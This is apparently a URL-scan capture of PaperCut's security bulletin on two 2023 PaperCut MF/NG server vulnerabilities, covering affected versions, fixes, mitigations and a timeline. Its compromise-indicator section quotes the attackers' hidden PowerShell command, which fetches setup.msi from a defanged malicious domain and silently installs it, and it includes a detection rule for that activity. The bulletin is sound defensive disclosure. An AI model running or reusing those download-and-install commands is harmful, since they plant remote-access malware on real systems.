www.papercut.com
34.95.115.145
Public Scan
Submitted URL: http://link.tps.es/ls/click?upn=tpIXezP47teQO-2B9SzogkTU1cNFNRdDwnXQu01UUjmNq9atAFO9Yiz0LGzDUNRGy4bk0Gx9zqwmzahTxq2...
Effective URL: https://www.papercut.com/kb/Main/PO-1216-and-PO-1219?utm_medium=email&utm_source=sharpspring&sslid=M7e0NDAzNDc3NTYzBgA&ss...
Submission: On April 26 via manual from US — Scanned from ES
Form analysis
1 form found in the DOM
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/8186336/5c87d4a3-6fe6-4abc-bda9-50feaf8f7a1c
Text Content
URGENT | PAPERCUT MF/NG VULNERABILITY BULLETIN (MARCH 2023)

This page will continue to be updated as new information becomes available. Last updated: 25 April 12.00 AEST.

We have received two vulnerability reports from a 3rd party cyber security company (Trend Micro), for high/critical severity security issues in PaperCut MF/NG. We have evidence to suggest that unpatched servers are being exploited in the wild. As a precaution, we are not able to reveal too much about these vulnerabilities.
We have documented what we can disclose below.

Critical: Please note that as of 18th April, 2023 (see “When was the exploit first detected in the wild?” in the FAQs) we have evidence to suggest that unpatched servers are being exploited in the wild (particularly ZDI-CAN-18987 / PO-1216). Our immediate advice is to upgrade your PaperCut Application Servers to one of the fixed versions listed below if you haven’t already.

If you suspect that your server has been compromised, we recommend taking server backups, then wiping the Application Server, and rebuilding the Application Server and restoring the database from a ‘safe’ backup point prior to when you discovered any suspicious behavior. We have also updated the FAQ “How do I know if my server has been exploited?” question below.

Important: Both of these vulnerabilities have been fixed in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11 and 22.0.9 and later. We highly recommend upgrading to one of these versions containing the fix (see the “Where can I get the upgrade?” question below).

ZDI-CAN-18987 / PO-1216 (also identified as CVE-2023-27350)

We have confirmed that under certain circumstances this allows for an unauthenticated attacker to get Remote Code Execution (RCE) on a PaperCut Application Server. This could be done remotely and without the need to log in. This vulnerability has been rated with a CVSS score of 9.8.

ZDI-CAN-19226 / PO-1219 (also identified as CVE-2023-27351)

We have confirmed that under certain circumstances this allows for an unauthenticated attacker to potentially pull information about a user stored within PaperCut MF or NG - including usernames, full names, email addresses, office/department info and any card numbers associated with the user.
The attacker can also retrieve the hashed passwords for internal PaperCut-created users only (note that this does not include any password hashes for users sync’d from directory sources such as Microsoft 365 / Google Workspace / Active Directory and others). This could be done remotely and without the need to log in. We do not have any evidence of this vulnerability being used against customers at this point. This vulnerability has been rated with a CVSS score of 8.2.

PRODUCT STATUS AND NEXT STEPS

Which PaperCut products are impacted, and what are the actions required?

| | ZDI-CAN-18987 / PO-1216 (CVE-2023-27350) | ZDI-CAN-19226 / PO-1219 (CVE-2023-27351) |
| --- | --- | --- |
| What versions are impacted? | PaperCut MF or NG version 8.0 or later, on all OS platforms | PaperCut MF or NG version 15.0 or later, on all OS platforms |
| Which PaperCut MF or NG components are impacted? | Application Servers are impacted. Site Servers are impacted. | Application Servers are impacted. |
| Which PaperCut components or products are NOT impacted? | PaperCut MF/NG secondary servers (Print Providers). PaperCut MF/NG Direct Print Monitors (Print Providers). PaperCut Hive. PaperCut Pocket. Print Deploy. Mobility Print. PaperCut User Client software. PaperCut Multiverse. Print Logger. | PaperCut MF/NG secondary servers (Print Providers). PaperCut MF/NG Direct Print Monitors (Print Providers). PaperCut MF/NG site servers. PaperCut Hive. PaperCut Pocket. Print Deploy. Mobility Print. PaperCut User Client software. PaperCut Multiverse. Print Logger. |
| Next steps | We recommend that you upgrade all Application Servers and Site Servers (see Upgrade documentation). You will not need to patch Secondary Servers (Print Providers / Direct Print Monitors) - but you can if you prefer. | We recommend that you upgrade all Application Servers and Site Servers (see Upgrade documentation). Even though the Site Server is not impacted by this vulnerability, you will need to upgrade them to match the version number of the Application Server. You will not need to patch Secondary Servers (Print Providers / Direct Print Monitors) - but you can if you prefer. |

FAQS

Q Where can I get the upgrade?

Please follow your usual upgrade procedure. Additional links on the ‘Check for updates’ page (accessed through the Admin interface > About > Version info > Check for updates) will allow customers to download fixes for previous major versions which are still supported (e.g. 20.1.7 and 21.2.11) as well as the current version available.

If you are using PaperCut MF, we highly recommend following your regular upgrade process. Your PaperCut partner or reseller information can also be found on the ‘About’ tab in the PaperCut admin interface.

Alternatively, get direct downloads from here. It’s easy to identify your edition of PaperCut - you’ll see it on the About tab or by checking the footer of your PaperCut admin login.

Q What products are impacted by these vulnerabilities?

See the ‘Which components are impacted’ or ‘Which components are not impacted’ rows in the table above for a detailed list.

Q What is PaperCut doing to assist customers?

PaperCut and its partner network have activated response teams to assist PaperCut MF and NG customers. Our service desks are manned 24/7 via our support page.

The security response team at PaperCut has been working with external security advisors to compile a list of unpatched PaperCut MF/NG servers that have ports open on the public internet. In addition to our email and in-app announcements to all customers, we’ve been using this list to proactively reach out to potentially exposed customers via multiple means from Wednesday afternoon (AEST) and are working 24/7 through the weekend.

Q When was the exploit first detected in the wild?

PaperCut received our first report from a customer of suspicious activity on their PaperCut server on the 18th April at 03:30 AEST / 17th April 17:30 UTC.
PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC.

Q Is there any impact from applying the upgrade?

There should be no negative impact from applying these security fixes. No other manual steps need to be taken.

Q Where are the release notes for these fixes?

You can see the release notes pages for PaperCut MF and NG which list all fixes included per version:

* MF - 20.1.7, 21.2.11, 22.0.9
* NG - 20.1.7, 21.2.11, 22.0.9

Q What are the CVSS scores for these vulnerabilities?

Vulnerability: ZDI-CAN-18987 / PO-1216

* Score: 9.8 (Critical)
* Breakdown: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Vulnerability: ZDI-CAN-19226 / PO-1219

* Score: 8.2 (High)
* Breakdown: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Q Is there more information available about these vulnerabilities?

Not at this time - to give customers a chance to upgrade, we are not releasing further details about these vulnerabilities.

Trend Micro have also advised they will disclose further information (TBD) about the vulnerability on 10th May 2023. For more information, see https://www.zerodayinitiative.com/advisories/upcoming/ (filter on “PaperCut”).

Q If we can’t upgrade to security patch, what other options are there?

Particularly if you have an older application version that doesn’t have a minor patch available, we highly recommend locking down network access to the server(s).

* Block all inbound traffic from external IPs to the web management port (port 9191 and 9192 by default).
* Block all traffic inbound to the web management portal on the firewall to the server. Note: this will prevent lateral movement from internal hosts but management of the PaperCut service can only be performed on that asset.
* Apply “Allow list” restrictions under Options > Advanced > Security > Allowed site server IP addresses. Set this to only allow the IP addresses of verified Site Servers on your network. Note this only addresses ZDI-CAN-19226 / PO-1219.

Q How do I know if my server has been exploited?

We currently recommend looking for the following Indicators of Compromise to determine if it is likely that the vulnerability has been used to install malware on the system. Depending on your systems, logging and endpoint protection software you may be able to detect the following.

* If your security software has raised any alerts or warnings
* If you see suspicious PaperCut MF application log entries, i.e.:
  * User “admin” logs into the administration interface
  * Admin user “admin” modified the print script on the printer
  * User “admin” updated the config key “…”
  * User “[setup-wizard]” modified a config key
* Domains in DNS or web proxy logs:
* SHA256 hashes of files on local system:
  * setup.msi f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb
  * ld.txt c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125
* PowerShell scripts having similar content to:

```
cmd /c "powershell.exe -nop -w hidden Invoke-WebRequest 'hXXp://upd488[.]windowservicecemter[.]com/download/setup.msi' -OutFile 'setup.msi' "
cmd /c "msiexec /i setup.msi /qn IntegratorLogin=fimaribahundqf[AT]gmx[.]com CompanyId=1"
```

* Detection via YARA Rule on SIEM:

```
title: PaperCut MF/NG Vulnerability
authors: Huntress DE&TH Team
description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG
logsource:
  category: process_creation
  product: windows
detection:
  # Matches cmd.exe or powershell.exe started with pc-app.exe as the parent process
  selection:
    ParentImage|endswith: "\\pc-app.exe"
    Image|endswith:
      - "\\cmd.exe"
      - "\\powershell.exe"
  condition: selection
level: high
falsepositives:
  - Expected admin activity
```

If you suspect that your server has been compromised, we recommend taking server backups, then wiping the Application Server, and rebuilding the Application Server and restoring the database from a ‘safe’ backup point prior to when you discovered any suspicious behavior.

We will update this question with more details as we find more information from our customer base and security community.

Q Is there a maintenance release for versions 19 or older?

No - versions 19 and older are now “end of life”, as documented on our End of Life Policy page. We recommend purchasing an updated license, which you can do online if you’re using PaperCut NG, or through your PaperCut Partner if you’re using PaperCut MF. You can find your PaperCut Partner contact information through the ‘About’ or ‘Help’ tab in the PaperCut administration interface.

Q I have a version 20 license, but no current M&S (maintenance and support) - can I still get this fix?

Yes! As long as you are running a version which is currently supported (version 20 or later) you can upgrade to whichever maintenance release version you’re licensed for. For example if you are licensed for version 20 but you don’t have a valid license for version 21, you can update to version 20.1.7 as above. See the ‘Where can I get the upgrade?’ question above for more details.

See our Upgrade Policy page for more information on licensing and upgrades.
ACKNOWLEDGEMENTS

PaperCut would like to thank the researchers working with Trend Micro for reporting these issues and working with us to help protect our customers:

* ZDI-CAN-19226 - Discovered by: Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative
* ZDI-CAN-18987 - Discovered by: Anonymous
* “Huntress” team members Joe Slowik, Caleb Stewart, Stuart Ashenbrenner, John Hammond, Jason Phelps, Sharon Martin, Kris Luzadre, Matt Anderson and Dave Kleinatland.

Trend Micro have also advised they will disclose further information (TBD) about the vulnerability on 10th May 2023. For more information, see https://www.zerodayinitiative.com/advisories/published/ (filter on “PaperCut”).

SECURITY NOTIFICATIONS

“How do I sign-up for PaperCut’s security mailing list?”

In order to get timely notifications of security news (including security related fixes or vulnerability information) please subscribe to our security notifications list via our Security notifications sign-up form. If you’re a sys admin or if you look after PaperCut product implementations at your organization, this list will help you be amongst the first to hear of any security related news or updates.

UPDATES

| Date | Update/Action |
| --- | --- |
| 10th January 2023 (AEDT) | Vulnerability reported to PaperCut, by Trend Micro (see ZDI-CAN-18987 and ZDI-CAN-19226). |
| 8th March 2023 (AEDT) | Released PaperCut MF and NG versions 20.1.7, 21.2.11 and 22.0.9 containing a fix for these vulnerabilities. Published this KB article documenting the vulnerability information. Sent communications to PaperCut partners and PaperCut security notifications email list. |
| 14th March 2023 (AEDT) | Trend Micro published additional details of the vulnerability on their website: ZDI-CAN-18987 and ZDI-CAN-19226. |
| 19th April 2023 (AEST) | Updated this KB with new information discovered on the 18th April - indicating evidence to suggest that unpatched servers are being exploited in the wild. |
| 20th April 2023 (AEST) | Published RCE security exploit in PaperCut servers blog post. |
| 21st April 2023 (AEST) | Added “If we can’t upgrade to security patch, what other options are there?” (replaced the old “Is there a mitigation for these vulnerabilities if I don’t want to upgrade?”). Updated Acknowledgements section. Updated “How do I know if my server has been exploited?” |
| 22nd April 2023 (AEST) | Added new FAQ explaining what PaperCut has been doing to proactively support PaperCut MF and NG customers. Added new FAQ “When was the exploit first detected in the wild?” |
| 23rd April 2023 (AEST) | No new updates - continuing to proactively reach out to customers with internet-facing servers. |
| 24th April 2023 (AEST) | Added direct download links to ‘Where can I get the upgrade’. |
| 25th April 2023 (AEST) | Clarified that Multiverse and Print Logger are NOT impacted. |

Categories: FAQ, Security and Privacy

Last updated Apr 25, 2023